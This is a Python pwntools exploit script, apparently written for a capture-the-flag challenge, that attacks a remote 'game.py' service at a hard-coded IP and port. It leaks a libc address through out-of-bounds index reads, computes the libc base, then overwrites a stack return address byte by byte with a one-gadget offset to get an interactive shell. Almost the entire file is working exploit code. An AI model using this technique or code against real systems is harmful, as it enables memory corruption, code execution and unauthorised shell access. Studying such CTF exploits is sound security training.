#!/usr/bin/env python
# -*- coding: utf-8 -*-
# This exploit script was scaffolded with:
# 1) pwntools
# 2) ctfmate
import os | |
import time | |
import pwn | |
# Paths to the local copies of the target interpreter and its loader/libc
# (relative to the working directory; the ELF() calls below read them at
# import time, so the module fails to import when they are missing).
BINARY = "./python3.10"
LIBC = "./libc.so.6"
LD = "/lib64/ld-linux-x86-64.so.2"
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
# Debugger window placement (tmux split) and corefile handling for pwntools.
pwn.context.terminal = ["tmux", "splitw", "-h"]
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
# Short aliases for the pwntools packing/unpacking helpers.
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8 = pwn.p8
u8 = pwn.u8
# Target endpoint; overridable on the command line via HOST=... PORT=...
# (pwntools `args`).  The commented alternatives are local-test values.
host = pwn.args.HOST or "52.59.124.14"
# host = pwn.args.HOST or "localhost"
port = int(pwn.args.PORT or 10013)
# port = int(pwn.args.PORT or 9090)
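def local(argv=None, *a, **kw):
    """Execute the target binary locally.

    Args:
        argv: extra command-line arguments appended after ``exe.path``.
            Defaults to no arguments; ``None`` is used instead of ``[]`` so
            the default list is not shared between calls.
        *a, **kw: forwarded to ``pwn.gdb.debug`` / ``pwn.process``.

    Returns:
        The pwntools tube for the started process.  When ``pwn.args.GDB`` is
        set the process is started under gdb with the module-level
        ``gdbscript`` (defined later in the file, resolved at call time).
    """
    argv = [] if argv is None else argv
    if pwn.args.GDB:
        return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    return pwn.process([exe.path] + argv, *a, **kw)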
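def remote(argv=None, *a, **kw):
    """Connect to the process on the remote host.

    ``argv``, ``*a`` and ``**kw`` are accepted only for signature parity with
    ``local`` and are not used; the connection always goes to the module-level
    ``host``/``port``.

    Returns:
        The connected pwntools tube.  When ``pwn.args.GDB`` is set,
        ``pwn.gdb.attach`` is called on it with ``gdbscript`` first.
    """
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io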
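def start(argv=None, *a, **kw):
    """Start the exploit against the target.

    Dispatches to ``local`` when ``pwn.args.LOCAL`` is set, otherwise to
    ``remote``.  ``argv`` defaults to ``None`` rather than a shared ``[]`` and
    is normalised to a fresh list before being passed on.

    Returns:
        The tube returned by ``local`` or ``remote``.
    """
    argv = [] if argv is None else argv
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    return remote(argv, *a, **kw)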
# gdb commands applied when the target is started or attached under GDB
# (see local()/remote()).  The string has no placeholders, so no
# formatting step is needed.
gdbscript = "\n".join(
    [
        "",
        "set follow-fork-mode parent",
        "continue",
        "",
    ]
)
def leak(io, index):
    """Collect eight values reported by the game at ``index`` .. ``index + 7``
    and pack them into one 64-bit integer.

    Drives a single "hard" round over ``io``: for each of eight positions it
    answers the two index prompts with ``0`` and ``index + i``, then parses the
    integers printed after ``"After: "`` and keeps the first one.

    Args:
        io: pwntools tube connected to the game.
        index: first position to query.

    Returns:
        The eight collected values, as a bytes object, unpacked with ``u64``.
    """
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    # NOTE: this local deliberately shadows the function name inside the body.
    leak = []
    for i in range(8):
        io.sendlineafter(b"Index 1: ", b"%d" % 0)
        io.sendlineafter(b"Index 2: ", b"%d" % (index + i))
        # Reply format assumed: "... After: <int> <int> ..." — only the first
        # integer is used.
        after = [int(i) for i in io.recvline().strip().split(b"After: ")[1].split()]
        leak.append(after[0])
    leak = u64(bytes(leak))
    return leak
def swap(io, idx1, idx2):
    """Play one "hard" round sending the index pairs ``(idx1 + i, idx2 + i)``
    for ``i`` in 0..7.

    Each index is sent as its decimal form followed by a NUL byte and
    ``p64(5)``; the game's replies are not parsed here.

    Returns:
        Always ``0``.
    """
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d\x00" + p64(5)) % (idx1 + i))
        io.sendlineafter(b"Index 2: ", (b"%d\x00" + p64(5)) % (idx2 + i))
    return 0
def write_byte(io, idx1, byte):
    """Play one "hard" round sending the same pair ``(idx1, byte)`` eight times.

    Both values are sent in plain decimal; the loop counter is not added to
    either of them.  The game's replies are not parsed here.

    Returns:
        Always ``0``.
    """
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d") % (idx1))
        io.sendlineafter(b"Index 2: ", (b"%d") % (byte))
    return 0
def exp(off):
    """Run the script end to end against the target selected by ``start()``.

    Args:
        off: effectively ignored — it is overwritten by the hard-coded ``off``
            assignment below (the alternatives that were tried are kept as
            comments).

    Side effects:
        Starts or connects to the target, logs the computed libc base with
        ``pwn.info``, then hands the tube to the user via ``io.interactive()``
        and closes it afterwards.
    """
    io = start(["game.py"])
    # ===========================================================
    # EXPLOIT GOES HERE
    # ===========================================================
    # Only referenced from the commented-out experiment below.
    total_ok = 0x108
    total_ns = 0x130
    # # swap(io, 0x198, 0xffffff)
    # io.sendlineafter(b"Easy or Hard? ", b"hard")
    # io.sendlineafter(b"Ready? ", b"")
    # io.recvline()
    # for i in range(1):
    #     io.sendlineafter(b"Index 1: ", (b"%d") % (5))
    #     io.sendlineafter(b"Index 2: ", (b"%d") % (total_ok))
    #
    # for i in range(1):
    #     io.sendlineafter(b"Index 1: ", (b"%d") % (0))
    #     io.sendlineafter(b"Index 2: ", (b"%d") % (total_ns+4))
    # for i in range(0x100, 0x200, 8):
    #     print(hex(leak(io, i)))
    libc_leak = leak(io, 0x8C8)
    # Hard-coded distance between the collected value and the libc base;
    # only valid for the libc shipped with the challenge.
    libc.address = libc_leak - 0x29E40
    pwn.info("libc: 0x%x\n" % libc.address)
    # Shadows the ``off`` parameter.
    off = 0x50A43  # 1
    # off = 0x80C55 # 1
    # off = 0x80C50 # 2
    # off = 0x80C50 # 4
    win = libc.address + off
    # win = 0x414141414141
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    # indexes of return addresses on the stack.
    ret_offs = [
        0xFFFFFF,  # for debugging
        0x2D8,
        0x828,
        0x658,
        0x7F8,
        0x2F8,
        0x708,
        0x6D8,
        0x608,
        0x5D8,
        0x598,
        0x4F8,
    ]
    # Sends ``win`` one byte at a time, least-significant byte first, at
    # consecutive positions from ret_offs[1]; only that one entry is used.
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d") % (ret_offs[1] + i))
        io.sendlineafter(b"Index 2: ", (b"%d") % ((win >> (i * 8)) & 0xFF))
    # print("offset: 0x%x" % off)
    # io.sendlineafter(b"Easy or Hard? ", b"asdf")
    io.interactive()
    io.close()
if __name__ == "__main__":
    # The argument is unused in practice: exp() reassigns ``off`` internally.
    exp(0)